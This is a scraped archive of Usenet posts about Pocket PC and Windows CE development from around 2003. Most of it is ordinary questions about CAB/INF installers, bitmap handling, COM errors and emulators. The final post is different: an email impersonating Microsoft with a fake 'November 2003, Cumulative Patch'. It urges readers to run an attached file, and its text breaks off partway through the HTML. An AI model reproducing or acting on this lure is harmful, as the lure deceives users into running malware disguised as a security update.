Directory Identifiers in INF-File
I am currently writing my cab-file for the program installation.
I cannot find a directory ID for the Flash Card. Is there something
not documented? I am looking for an additional %CEn% ID.
Thanks.
Mike Tag: Device Emulator 4.1 to 4.2 Tag: 68232
RotateFlip
Hi,
I am trying to rotate a picture 90 degrees in a PictureBox. The
problem i have is that it seems all functionality to do so in .NET CF
has beenleft out. There is still GetPixel/SetPixel but it takes over 1
minute for a 640*480 picture.
I tried using the API but it is not working even though it is not
crashing.
Under Win2k, this piece of code should be working according to some
information found on internet. But is doesn't even though it doesn't
crash.
I suppose there is something i don't understand regarding bitmaps. Any
knows about it? I also tried some things with VB6. Still the same
result. The programs runs well but the picture stays unchanged.
Thanks for any help
====================================
<DllImport("kernel32.dll", EntryPoint:="LocalAlloc")> _
Private Shared Function LocalAlloc(ByVal uFlags As Integer, ByVal
uBytes As Integer) As IntPtr
End Function
<DllImport("kernel32.dll", EntryPoint:="LocalFree")> _
Private Shared Function LocalFree(ByVal hMem As IntPtr) As IntPtr
End Function
<DllImport("gdi32.dll", EntryPoint:="DeleteObject")> _
Private Shared Function DeleteObject(ByVal hObject As IntPtr) As
IntPtr
End Function
<DllImport("gdi32.dll", EntryPoint:="CreateBitmapIndirect")> _
Public Shared Function CreateBitmapIndirect(ByRef lpBitmap As
MYBITMAP) As IntPtr
End Function
<DllImport("gdi32.dll", EntryPoint:="GetObject")> _
Public Shared Function GetObject(ByVal hBitmap As IntPtr, ByVal
nSize As Int32, ByRef myBmp As MYBITMAP) As Int32
End Function
Public Structure MYBITMAP
Public bmType As Integer
Public bmWidth As Integer
Public bmHeight As Integer
Public bmWidthBytes As Integer
Public bmPlanes As Int16
Public bmBitsPixel As Int16
Public bmBits As IntPtr
End Structure
...
Dim bm_in As New Bitmap(PictureBox1.Image)
Dim hBitmap As IntPtr = bm_in.GetHbitmap()
GetObject(hBitmap, Marshal.SizeOf(bitmap), bitmap)
Dim pBytes(bitmap.bmHeight)() As Byte
Dim iCnt As Integer
For iCnt = 0 To bitmap.bmHeight - 1
ReDim pBytes(iCnt)(bitmap.bmWidthBytes - 1)
Marshal.Copy(bitmap.bmBits, pBytes(iCnt), iCnt * _
bitmap.bmWidthBytes, bitmap.bmWidthBytes)
Next
' ...... Code to flip the picture. Altering the byte array
hMem = LocalAlloc(LPTR, bitmap.bmWidthBytes * bitmap.bmHeight)
For iCnt = 0 To bitmap.bmHeight - 1
Marshal.Copy(New _
IntPtr(hMem.ToInt32()+iCnt*bitmap.bmWidthBytes),pBytes(iCnt), _
bitmap.bmWidthBytes)
Next
Dim newbitmap as MYBITMAP
With newbitmap
iBytes = bitmap.bmWidthBytes / bitmap.bmWidth
iHeight = 500
.bmHeight = bitmap.bmWidth
.bmWidth = iHeight
.bmWidthBytes = bitmap.bmWidth * iBytes
.bmType = bitmap.bmType
.bmBitsPerPixel = bitmap.bmBitsPerPixel
.bmPLanes = bitmap.bmPlanes
.bmBits = hMem
End With
hBitmap = CreateBitmapIndirect(newbitmap)
PictureBox1.Image = Image.FromHBitmap(hBitmap)
LocalFree(hMem)
DeleteObject(hBitmap) Tag: Device Emulator 4.1 to 4.2 Tag: 68231
Getting an evb app onto pocket pc
I have to design a program in evb for pocket pc, but I don't have a
clue where to start.
I have all the basic programs installed on my pc, but now I'm stuck!
I have already designed my program, but I don't have an idea how to
get it onto the pocket pc. I'm am relatively new to this as I am used
to programming in clarion, so if someone can please give me some
advice I would appreciate it!
Another problem I am experiencing is that when the project compilesthe
emulator opens up and the program displays too large for the "screen"
of the emulator, when I close the program, the emulator has "Channel
errors" all over the display. Are these two problems link and how do I
correct it?
Thanks Tag: Device Emulator 4.1 to 4.2 Tag: 68227
making registry entries
Hi,
I would like to register a new file type into the PPC registry and have two
questions:
1. How can I do it during the installation process (what entries must be
made to .inf or .ini)? I am using eVB with the standard application wizard.
2. How can I access the registry (create, change and read entries) in eVB?
Thank you!
Gergo Tag: Device Emulator 4.1 to 4.2 Tag: 68226
How can I install an ActiveX?
Hi All.
I have developed an ActiveX to interact with Internet Explorer
but I am not able to install the component on the pocket pc.
I have read a lot of documentation, looking for info in newsgroups
but nothing, so I post this message here to get some help.
At this point I know that I need to create a .INF file. In this .INF I
have wroten the following:
setup.inf
...................................
[Version]
Signature = "$Windows NT$"
Provider = "Me"
CESignature = "$Windows CE$"
[CEStrings]
AppName="XXX"
InstallDir=%CE2%\
[Strings]
sh3_cpu = 10003
sh4_cpu = 10005
mips_cpu = 4000
strongarm_cpu = 2577
armcpu = 1824
[CEDevice]
UnsupportedPlatforms = "Jupiter","HPC" ; Does not support pltfrm1
VersionMin = 3.0
VersionMax = 100
[DefaultInstall]
CopyFiles = Files.Windows
CESelfRegister = XXX.dll
[SourceDisksNames]
1 = ,"Common files",,.
[SourceDisksFiles]
XXX.dll = 1
[DestinationDirs]
Files.Windows = 0,%CE2% ;\Windows
[Files.Windows]
XXX.dll,,,0x20000000 ; rename, and mark as shared
So, in the same directory as the dll exists, I create the cab file with
cabwiz setup.inf
I donwload the .CAB from the Internet Explorer and ask me for
install the applicacion ... all is ok but the file XXX.dll is not copied
in the \windows directory and not registered, of course.
What I'm missing, or what is wrong?
Thanks a lot for your comments!!
PD: I don't know if it's important by I'm using a iPAQ
Antonio. Tag: Device Emulator 4.1 to 4.2 Tag: 68225
Printer CE
Dear friends,
I 've a problem with Printer CE.
I need print invoice from Pocket Pc 2002. I 've installed the Printer CE on
Developer Desktop and on Pocket Pc.
When I try print from Pocket Pc to file prn, the file prn not is correct.
¿Anybody know about this problem?
Best Regards,
Alamo Tag: Device Emulator 4.1 to 4.2 Tag: 68224
SqlCeReplication : pIErrors
What do pIErrors and pIReplication members mean in
SqlCeReplication class? I got pIErrors 3306712 and
pIReplication 3297272. Tag: Device Emulator 4.1 to 4.2 Tag: 68213
Read SMS programatically in PPC 2003
Hi Frnd,
I'm supposed to read SMS programatically from Inbox in
Pocket PC 2003.
Can u suggest me a way to do so? Any tip or suggestion
would be of great help.
Thanx Tag: Device Emulator 4.1 to 4.2 Tag: 68210
SmartPhone (SP) and CryptoApi with CompactFramework (.NETcf) - new DEVBUZZ tutorial
Hi all,
=2ENETcf does not have the namespace System=2ESecurity=2ECryptography=2E=
Yet
we really need it as the world becomes more wireless, and we dont=
want
our data available in the clear for wireless sniffers or network
operators, especially with certain wireless security mechanisms=
being
in question (i=2Ee=2E WEP)=2E Luckily, both the SmartPhone and=
PocketPC
devices come with the CryptoApi=2E The CryptoApi is an unmanaged=
API
used to call unmanaged cryptographic implementations that exist=
on the
devices as well=2E This can be done through pInvokes=2E In this=
article I
will wrap the entire CryptoApi (version 1)=2E
http://www=2Edevbuzz=2Ecom/content/zinc_smartphone_cryptography_pg1=2Ea=
sp
--
Regards
Derek Mitchell
news@devbuzz=2Ecom
=2ENET Compact Framework Tutorials:
- http://www=2Edevbuzz=2Ecom/content/init_compact_framework=2Easp
eVB Tutorials:
- http://www=2Edevbuzz=2Ecom/content/init_starting_out=2Easp
Pocket PC Development Forums:
- http://forums=2Edevbuzz=2Ecom/
Code Snippets:
- http://www=2Edevbuzz=2Ecom/content/code_snippet_list=2Easp Tag: Device Emulator 4.1 to 4.2 Tag: 68208
Pretek CompactCamera SDK
Hi there,
Has anyone tried programming for the Pretec CompactCamera? I located
the SDK (not from Pretec), but the sample app doesn't work ('Camera
not detected' error: it is unable to get a handle from the CompCamOpen
call).
Has anyone else had the same problem? I have tried contacting Pretec
without luck...
Cheers,
Jason (Brisbane, Australia). Tag: Device Emulator 4.1 to 4.2 Tag: 68206
How can I get a siginal from remote controler?
I have a PPC, and want to get a siginal from remote controler.
Exactly, I want to make a remote controling s/w for other electronic device
such as tv ,dvd and etc.
so, I analyzed some similar soft wares.
The softwares receive signals from remote controler, and save it.
And then when specific key is pressed,the software send a signal among the
saving signals.
I want to make a software like it.
I think , the softwares use Irda port.
If you have any documents or get a referenct site url, please let me know
...
Thank you. Tag: Device Emulator 4.1 to 4.2 Tag: 68200
PIE bug with %20 in file URL's
I typed the following URL of an existing file in the address-bar of PIE :
file://\Program%20Files\PocketTV\PocketTV.exe
and it did not work, I got:
on Pocket PC: Error: Cannot open "Files\PocketTV\PocketTV.exe"
on Smartphone: Error: The page you are looking for cannot be found
I did the test on Smartphone 2002 and 2003 and Pocket PC 2002
Of course, on Smartphone 2002, I used the URL
file://\IPSM\Program%20Files\PocketTV\PocketTV.exe
and on Smartphone 2002, I used the URL
file://\Storage\Program%20Files\PocketTV\PocketTV.exe
I also tried with document files located in \My Documents, same error.
It works well as long as there is no space in the file pathname. But %20 is
still not handled properly in file URL's.
Apparently this old PIE bug made it to Windows Mobile 2003 ... jezzzz!
:(
"GG" <see@my.sig> wrote in message
news:ebCbNIupDHA.2440@TK2MSFTNGP10.phx.gbl...
> "Sven" <f> wrote in message news:upH28dtpDHA.360@TK2MSFTNGP12.phx.gbl...
> > Hi
> >
> > I have downloaded the Smartphone 2003 emulator... how can I now install
> > programms on this emulator?
> > I mean i can connect a folder, but how can I access this folder on the
> phone
> > as the phone does not have a explorer?
> >
> > I knew that there is a possibilty in the internet explorer to start
> > programms, but i do not know the sintax...
> >
> > should be like this: file://IPSM/a.exe?
> >
>
> It's like file:///IPSM/a.exe - (3 slashes) and, if there is a space,
replace
> it with %20:
>
> file:///My%20documents/test.exe
>
> HTH,
>
>
> --
> Giuseppe Govi
> g.govi <a> vodafone.it
>
> Tag: Device Emulator 4.1 to 4.2 Tag: 68199
EV3.0 ATL dll from C#.
I am having problems calling a DLL. I have the DLL
registered. It was created with EV3.0. I am calling it
this way.
[DllImport("contact.dll")] private static extern int
createContact(string firstName, string lastName, string
number, string address);
createContact
("foo","asdasda","asdasdasd","asdawdasdasdasd");
Anyone have any ideas?
Help appreciated
Camm Tag: Device Emulator 4.1 to 4.2 Tag: 68198
Converting eVC3.0 code to eVC4.0
I currently have a project that was initially created
under the 3.0 environment, I have not used the 4.0
environment much and would like to bring my project up to
the 4.0 environment to take advantageof what it has to
offer, can anyone point me in the right direction about
how to go about this? Or provide an resources to help me
out. Thanx in advance
Abe Tag: Device Emulator 4.1 to 4.2 Tag: 68196
What national Languages?
Hi,
I have almost completed a Pocket PC application which I
intend to release commercially.
Other than English, I am wondering what languages are
supported by the various hardware manufacturers?
Also does anyone have an idea of the relative sales per
language, i.e which language should I target next, based
on market size?
Thanks,
Allen Tag: Device Emulator 4.1 to 4.2 Tag: 68195
product ID for pocket pc 2002
Hi
I want to log a call with microsoft online. It keeps asking me for a
product ID where can i find it? or how do i log a call with microsoft
Neil Tag: Device Emulator 4.1 to 4.2 Tag: 68189
question about CLASS_E_NOAGGREGATION
first, here is my code:
HRESULT hr;
ICeFileFilter* filter = NULL;
hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
hr = CoCreateInstance(CLSID_NULL, &ICeFileFilter::IUnknown(), CLSCTX_ALL,
IID_ICeFileFilter, (LPVOID*)&filter);
and hr comes back as CLASS_E_NOAGGREGATION. what does this error message
mean? how can i fix it?
thanks,
edward Tag: Device Emulator 4.1 to 4.2 Tag: 68187
IR port access
I am trying to access the ir port directly. I see that
people can do things like read ir output from other
devices such as remote control for tv so, how? It can't be
by irda because that is not the same as the remote spec.
? Tag: Device Emulator 4.1 to 4.2 Tag: 68186
icon for eVB application
Hello,
Can I create an own icon for my eVB application? I would not like to use the
standard that is associated with .vb files.
sorry for asking a lot on this forum, I am now close to finish my
application.
Gergo Tag: Device Emulator 4.1 to 4.2 Tag: 68176
Question: Beginning Pocket PC 2003 Development using VB.NET 2003
I've got a simple question on getting started to develop applications
targetting Window Mobile 2003 Pocket PC devices, using Visual Basic
.NET 2003.
On my development machine, I have installed Visual Studio .NET 2003
and after that, the Pocket PC 2003 SDK.
To begin a new project, I selected Visual Basic Projects->Smart Device
Application. The wizard will bring me to a screen where I'm supposed
to select which platform my code is targetting. The only options I
have are:
1. Windows CE, with the following devices: Windows CE .NET Device,
Windows CE .NET Emulator, Pocket PC Device, Pocket PC 2002 Emulator.
2. Pocket PC, with the following devices: Pocket PC Device, Pocket PC
2002 Emulator.
My question is: What am I supposed to select to begin coding for
Pocket PC 2003 devices? I'm expecting to see something like Pocket PC
2003 Emulator and Pocket PC 2003 Device, since I've already installed
the PPC 2003 SDK... or am i missing something.
Thank you very much!
ds Tag: Device Emulator 4.1 to 4.2 Tag: 68175
can someone answer this? possibly MS
Hi,
In my non-MFC project, I added a edit box.. as par the requirements, i had
to set make it as read-only. I did that but this action changed its
background color. The workaround is to paint the background programatticaly
so ,as always, i proceeded to handle WM_CTLCOLOREDIT message. but this didnt
work. after a quick look at the documentation, i found that read-only edit
box doesnt send this message but sends WM_CTLCOLORSTATIC message. OK, no
problem... i removed WM_CTLCOLOREDIT message handler and added
WM_CTLCOLORSTATIC message handler. to my surprise, this was not getting
called even???? after browsing through the net i found that read-only edit
box sends WM_CTLCOLORBTN message!!! I want to know *why* it sends this
message? I could justify myself about WM_CTLCOLORSTATIC message but not
WM_CTLCOLORBTN!!! Why documentation says that read-only edit control will be
sent WM_CTLCOLORSTATIC?
------
Deepesh Tag: Device Emulator 4.1 to 4.2 Tag: 68172
Accessing Pocket Outlook Unser Interface programatically
Hi,
I want to use the Pocket Outlook User-Interface to simply select a Contact.
Using POOM I can get all the contacts, but I cant find a way to utilize the
user-interface as I dont want to end up rewriting an User-Interface to
select a contact which is already there.
Any hints?
Thanks,
Andreas Tag: Device Emulator 4.1 to 4.2 Tag: 68169
Servlet engine for Pocket PC (iPaq)
Hi all,
I am looking for a servlet engine that I can use on a
Pocket PC (iPaq).
This might seem strange to most of you, so here is some
background:
We are having a desktop application (insurance sector)
that is implemented as JSP/servlets and want to port this
to a handheld. The handheld is for sales people that go
from house to house and will usually not be connected.
Therefore they should carry their "server" parts (servlet
engine and servlets) with them on the handheld
In the desktop/server world we are using IIS as Web server
and the New Atlanta ServlerExec servlet engine. What I am
looking for is a replacement for these on the handheld,
let it be Pocket PC (Windows CE) or Linux. Pocket PC,
however, is the preferred platform. :-))~~~
Thanks a lot,
Regards,
Klaus.
______________________________________
Klaus Pinkert
Softlab GmbH
klaus.pinkert@softlab.de Tag: Device Emulator 4.1 to 4.2 Tag: 68168
Archives of this usenet group?
I'd like to find an archive of this Usenet group. Does anyone, Microsoft
or other, know where such an archive might be found?
--
Dennis Gallagher
Monroe, WA, USA Tag: Device Emulator 4.1 to 4.2 Tag: 68165
Emulator question
Hi,
I'm running embbededVB 3 and trying to use the inbuilt emulator. I'm getting
file not found when trying to load a file. How do I point the emulator to
the correct folder/directory?
Thanks in advance. Tag: Device Emulator 4.1 to 4.2 Tag: 68164
HW Handshaking via RasDial
Using RasDial to establish a connection (via external
modem) to the internet, under CE 3.0/PocketPC, I get many
data overruns during large upload transmission if the
baud rate is set too high.
The proper HW handshake AT codes are being sent to the
modem. (The modem is actually a satellite phone with
data service.)
Is there a way of establishing default HW handshaking
(RTS/CTS) for the com port that is used by RasDial, as
RasDial opens the port... or is there a way to set
RTS/CTS on the port/handle returned by RasDial?
-Ron Geiser
G-Soft, Inc. Tag: Device Emulator 4.1 to 4.2 Tag: 68162
URGENT - Pocket PC Emulator Problem - Please! Can someone help???
I need the ability to emulate storage card folders with the PocketPC
Emulator in VS.NET.
This is possible with the PocketPC Emulator that comes with the
Microsoft Pocket PC 2003 SDK, but not with VS.NET.
Why?
There are two versions of the emulator.
VS.NET is version 4.1.0.(Build 14)
PPC SDK is version 4.2.0.20
VS.NET will not "see" the 4.2.0.20 version if it is launched prior to
running VS.NET 2003.
Both also use different directory structures and I haven't been
successfull in simply replacing the emulator files.
So how do you get the latest version to work with VS.NET??
Please, can someone help with this? Tag: Device Emulator 4.1 to 4.2 Tag: 68159
com interface trouble
ok, i'm trying to use the file type filters that are used to convert from
pocket pc to desktop formats when using activesync. but i seem to have hit
a brick wall. i'm rather new to COM interfaces, but here is my code so far:
ICeFileFilter* filter = NULL;
CoInitializeEx(NULL, COINIT_MULTITHREADED);
CoCreateInstance(CLSID_NULL, NULL, CLSCTX_ALL, IID_ICeFileFilter,
(LPVOID*)&filter);
and i receive this error message:
error LNK2001: unresolved external symbol _IID_ICeFileFilter
i've included these .lib files
rapi.lib
pegconv.lib
ceutil.lib
what is going on? what am i doing wrong?
thanks in advance,
edward Tag: Device Emulator 4.1 to 4.2 Tag: 68158
Microsoft Pocket PC 2003 SDK fails to install
Hi all,
I own an Ipag 4150 from HP. It comes with windows mobile 2003.
I installed eMbedded Visual C++ 4.0 and service pack 2.
When I try to install the MS Pocket PC 2003 SDK (msi installer) I'll get an
unspecified error. The only thing I can do is click the finish button.
I can write C# code with Visual Studio .NET 2003 and deploy the programs
succesfully using ActiveSync 3.7.1.
But I want to write native C++ code for game developing.
I have Windows XP Professional with service pack 1. I also tried it on my
laptop that has the standard Windows XP Professional. That doesn't work
either.
Is there anybody with the same problems or an correct working version of de
Pocket PC 2003 SDK??
Kind regards,
Jaap Tag: Device Emulator 4.1 to 4.2 Tag: 68152
Pocket GCC
Hi,
I'm triing to compile a console app with "Pocket GCC", but the linker
complains about missing "WinMainCRTStartup". What am I doing wrong?
Thanks,
Roland Tag: Device Emulator 4.1 to 4.2 Tag: 68150
Permanent storage on Toshiba e330
Hi,
I've got a Toshiba e330 Pocket PC,
The specs say that it has got a 32 MB of flash ROM.
Is there any Permanent storage available for the Toshiba e330?
How can I access it?
On my iPAQ H3765, there's 6 MB of the Permanent storage space called
'iPAQ File Store'
For the Toshiba e330, I checked the registry for the Permanent storage
The registry value 'FolderName'at
'HKEY_LOCAL_MACHINE\Drivers\BuiltIn\Flshdrv
indicates that the Permanent storage is called as 'Flash ROM Disk'
But I could not find any such folder in Explorer under 'My Device'
Is there someone willing to share some information?
Please help.
Regards,
Viv Tag: Device Emulator 4.1 to 4.2 Tag: 68147
Databases on PocketPC?
Hello
I might buy a PocketPC, because I think it supports a huge spectrum of
software. I haven't yet any idea which brand I should take, but I need one,
where I can run a DB. I've already created on my own a DB (MySQL and PHP) on
my notebook (literature management) and I don't think that a Microsoft
Environement will support this one?! on the notebook it does, clearly, but
on a Pocket PC? whatever, I'm going to rewrite the DB in Access and I'm
going to transfer the information from MySQL to Access. (is it necessary?)
Shouldn't be a problem.
But now my question: if I am doing that I wanna be sure that Pocket PC's
support Access? or is there an alternative DB-solution for a PocketPC? Very
important ist also that it is possible to install an equivalent DB on my
laptop - the only thing is that they have to communicate together, i.e.
snychronization! do I have to write the Interface? I hope not, 'cause I am
not able to do that! hope, there's a simple solution!
any Idea? I am thankfull for every hint!
greets
mirco Tag: Device Emulator 4.1 to 4.2 Tag: 68140
how create menu
SGkhDQpJJ20gc29ycnkgZm9yIG15IGVhc3kgcXVlc3Rpb24/IEhvdyBjYW4gSSBjcmVhdGUgc2lt
cGxlIG1lbnUgaW4gZVZDKysgMy4wPyBPbmx5IEFQSSAobm90IE1GQyk= Tag: Device Emulator 4.1 to 4.2 Tag: 68135
Listing generation question.
Hello,
Is it possible with eVC++ to have a listing output
having source code with macro statements (#define)
expanded?
TIA Tag: Device Emulator 4.1 to 4.2 Tag: 68130
Progamatically Create Outlook Task on PocketPC with C#
Can any one give the a reference on how to Progamatically Create Outlook
Task on PocketPC with C# 2003? I've got the Pocket PC SDK installed and VS
2003.
Thanks in advance
Mike Tag: Device Emulator 4.1 to 4.2 Tag: 68125
Pocket PC POOM 'Cannot rum menu add in'
I am trying to add menu to the Contacts app on pocket pc
I have followed the procedures on
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wcepoom/html/ceconMenuExtensibility.asp
but when I click on the menu item I get a popup dialog with the following
warning (exclaimation), and my DLL doesn't run
'Cannot run menu add in'
I have triple verified the entries in my registry are correct. And, I have
also tried placing the DLL under '\' and '\Windows' folders and I always get
the same error.
Anyone knows what I am doing wrong? Or if there are issues regarding this? Tag: Device Emulator 4.1 to 4.2 Tag: 68123
make exe or cab file from eVB project
Hello
does anyone know how to create an executable file from an eVB project?
Thanks
Gergo Tag: Device Emulator 4.1 to 4.2 Tag: 68120
launch app from within help file?
Is it possible to put a link into a html Help file that will launch
another application? For instance, if I want to create a html Help
file that will be viewed with peghelp.exe, and I want a link in that
file that will launch calc.exe, how would I do that? (Specifically on
PPC2003)
Thanks,
billy Tag: Device Emulator 4.1 to 4.2 Tag: 68115
Look at the corrective package from M$
--oczahgjakhhts
Content-Type: multipart/related; boundary="trsayklbcwblkxay";
type="multipart/alternative"
--trsayklbcwblkxay
Content-Type: multipart/alternative; boundary="ssmnnwyl"
--ssmnnwyl
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
MS User
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which fixes
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express.
Install now to continue keeping your computer secure.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
--ssmnnwyl
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:ozwekiz" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
MS User<BR><BR>
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which fixes
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express.
Install now to continue keeping your computer secure.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:tuypzyv" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"ci